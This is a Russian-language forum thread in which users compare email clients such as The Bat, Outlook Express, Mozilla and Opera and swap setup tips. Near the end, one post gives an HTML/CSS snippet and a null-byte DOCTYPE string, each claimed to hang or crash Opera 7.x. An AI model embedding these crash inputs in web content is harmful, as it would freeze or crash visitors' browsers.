Конференция работает на сервере Netberg

Radeon.ru

Конференция Radeon.ru

Страница 1 из 2 [ Сообщений: 50 ]  Версия для печати [+] На страницу 1, 2  След.
Показать сообщения за  Поле сортировки  
Посоветуйте с выбором.
А the_bat попробуй. Я попробовал — вроде ничего. Опять Атлук настраивать лень, так шо переходить пока не буду. Особенныхх преимуществ не нашел, хотя и не искал.
The Bat — просто супер интерфейс (субъективно), куча настроек по фильтрации и ...3х годичная привычка — никаких глюков не заметил
зе бат!
Fidlook SL как дополнение ОЕ — там настроек полно, запрет скриптов и тп. + ньсы нормально поддерживаются.
Ньюсы и зе батом поддерживаются — стоит только поставить соответствующую прогу (или плагин) точно не помню как ее классифицирует автор, просто не читаю ньюсов — не нужны.
aleko2141
www.ritlabs.com
альтернативы нет, имхо.
aleko2141
а зачем тебе?
Пользуйся экспессом и не страдай ерундой.
wolfman
ты че, гонишь — аутглюк юзать? Вот человек что-то похоже понял, а ты не страдай ерундой.
Darth_Vader
patrees
Дело в том что когда то (года 4 назад) поставил The Bat, не помню что за версия, но она не поддерживала html, точнее чтобы сообщения посмотреть в html нужно сбоку на прикрепленый файл кликать и еще там чего то...короче погано стало, выкинул нах. Теперь хочу с Оутглюка слезть. Кстати какая счас последняя русская версия The Bat?
wolfman
А я и не страдаю.
aleko2141
Есть ещё такая штука как marlin — не сильно хуже лмыши, да и freeware
aleko2141
http://www.mozilla.org/products/thunderbird/
Вот еще ничего, но предупреждаю, может падать (хотя я такого не встречал) ...
Похожа и на бат и на аутлуук одновремено, свой движок для HTML показа, приколный редактор сообщений,
Фильтр от спама (Baues вроде), вообщем мне понравился
aleko2141
Сам юзаю Бат. А еще есть неплохая маленькая такая программка, "Lotus Notes" называется Изображение. И ещё из той же оперы Novell GroupWise Изображение
А меня Outlook Express вполне устраивает.
а я всю жизнь использую сначала нетскейп, потом мозилу для инета и личного мыла и мне хватает.
Эксплорер только для некоторых сайтов или чтобы куки свои не светить, когда не хочу.
Аутглюк экспресс — для левых временных целей.
Для работы альтернативы аутглюку (нормальному), как к полноценному клиенту и административной примочке Эксчендж сервера не существует, да и видеть её надо постоянно чтобы на вопросы юзеров по ней же отвечать.
Darth_Vader
Я пользуюсь зе батом, только потому, что жизнь вынудила, касперский 4.0 и выше не хотел работать с аутлук эксперсс, перешёл на зе бат.
Я долго парился с правилами, т.к в аутлук они работали на ура, а в зе бате пришлось довольно долго мучиться. Да и кряку пришлось искать, а аутлук бесплатный! Жаль, что аутлук экспресс больше не будет, мелкософтовые решили его больше не поддерживать.

вобще не плохой е-майл клиен The Bee, помещается на дискету, а внутри ещё и тётя ася есть!
Darth_Vader
Я пользуюсь зе батом, только потому, что жизнь вынудила, касперский 4.0 и выше не хотел работать с аутлук эксперсс, перешёл на зе бат.
Я долго парился с правилами, т.к в аутлук они работали на ура, а в зе бате пришлось довольно долго мучиться. Да и кряку пришлось искать, а аутлук бесплатный! Жаль, что аутлук экспресс больше не будет, мелкософтовые решили его больше не поддерживать.

вобще не плохой е-майл клиен The Bee, помещается на дискету, а внутри ещё и тётя ася есть!
Сижу очень давно на Mozilla. Перешел на нее аж после выхода SP1 для WinXP, радуюсь как дите Изображение
Обновляется постоянно, бесплатная. Все есть. Плюс там и браузер и IRC чат и HTML редактор и все счастье 11 мегов.
Ray Adams
У тебя версия Мозилки какая? Безуспешно пытаюсь настроить почтовик в 1.5. Мож чего подскажешь. Пишет "Истекло время ожидания сервера" При этом ни пароля ничего не запрашивает, связь по Диал-лапу есессенно Изображение
vaso
ну вообще то использовать Notes для работы только с почтой глупо — все равно что покупать 9800 и играть только в "Сапера"... да и не маленький он ... 180 метров весит.
max-sever
звони в тех-поддержку провайдера.
Использовал все с версии 1,2 до 1,6 (только английские) проблемы случались, но потом устранялись.

Сейчас использую собственный почтовый сервер, который собирает и почту из других ящиков,
общаюсь с ним тоже по рор3. Никаких проблем.
di//ka
Да порадовал Изображение Уж очень твердолобый у нас пров. Монополист.
max-sever
Он не любит firewall(или наоборот). Отключи firewall. При отправке нужно указать один SMTP-сервер. Иногда это вызывает трудности.
А так Мозилла рулит!!!
могу предложить на выбор на мой взгляд лучший почтовый клиент(по крайней мере для меня) встроенный в оперу версии 7.хх
любые настройки , да и вообще всё в одном , думаю что следующий ie7 будет точь в точь как опера
так что тоьлько его
<font class="off">NEWNIK
Ну ты даёшь... За чистую монету взял. Я же пошутил ИзображениеИзображениеИзображение</font>
max-sever
С настройкой почты помогут.
Просто не стоит всё это в форуме тереть.
По телефону быстрее.
Ещё было что-то не приятное с почной в пререлизах 1,5. Я даже написать им хотел, но увидел,
что уже написано и исправляется. Может оно в русскую версию случайно попало. Тогда ставь 1.6 английскую и нафиг не нужны эти локализованные интерфейсы. Не так там много непонятных слов, чтобы их не запомнить.
Я тоже ничего особенно плохого в OE не вижу.
SAP
Приэтом кучу дырок в придачу!
Опера, на сегодняшний день, полный отстой, а когда-то был не плохой браузер.
Khar-Selim
Он не любит firewall(или наоборот).
ХМ.... Спасибо за инфу, попробую Изображение
di//ka
Тогда ставь 1.6 английскую и нафиг не нужны эти локализованные интерфейсы. Не так там много непонятных слов, чтобы их не запомнить.
Эх 12 метров Изображение Буду ждать на дисках. Качать долго. Но Мозилка рулит, сначала ерепенился, всё Оперу хвалил, потом попалась на диске версия 1.5 и я понял как я заблуждался Изображение
Оутглюк делает такую каку: автоматически ставит галку на Разрыв почты после приема/посылки сообщений. Я когда в первый раз столкнулся с такой хренотой, думал что вирусняк опять залетел. Бывает, а глюк непонятен. Вот я и создал тему по поводу перехода на более альтернативный вариант почтового клиента.
aleko2141
так убери галку то и будет всё ок!
Я вот не могу заставить зе бат отрубаться после приёма почты, работает через раз!
SAP
А я Opera использую как броузер, но почтовый клиент у нее мне не по вкусу. Mozill'овый лучше ИМХО. Эх, к Опере бы этот клиент, да еще... Изображение
wolfman
Ну так я убираю, а она {галка} опять ставится...полтерГейтс блин Изображение
лучший набор: опера, бат и миранда!
x0ff
Опера-гуно позорное, сколько перепробовал, один плюс-страницы каждый раз по новому не загружает. Под нее не все проги идут (это мягко говоря).
aleko2141
Забавно. У меня такой байды не было, а в настройках смотрел?

На счет оперы- присоединяюсь, самая лучшая опера была версии 5, а дальше отстой пошёл.
А новая опера 7.хх так вобще дырявее рыболовной сети.

Khar-Selim
У мазиллы не плохой почтовый клиент, но уж очень тормознутый, пока он с серваком соединяется Бат и ОЕ уже получат всю почту.
2wolfman
скажите мне чем она (7.23) дырявее ослика??? Назови конкретные дыры.
x0ff
Конкретные дырки я не смогу назвать, но посмотри соответсвующие сайты, посвящённые безопасности и увидишь.
а ты в курсе, что уже вышла опера 7.50?
на подходе новая версия, почитай изменения.
x0ff
хотя вот:

Следующий код заставит Оперу зависнуть + 100% загрузка процессора

QUOTE
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>

или вот <!DOCTYPE[x00]A>

где [x00] это один символ, x00 его шестнадцатиричный код
и опера мертва.
Новая тема    Ответить  [ Сообщений: 50 ]  На страницу 1, 2  След.


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  

Удалить cookies конференции

Пишите нам | Radeon.ru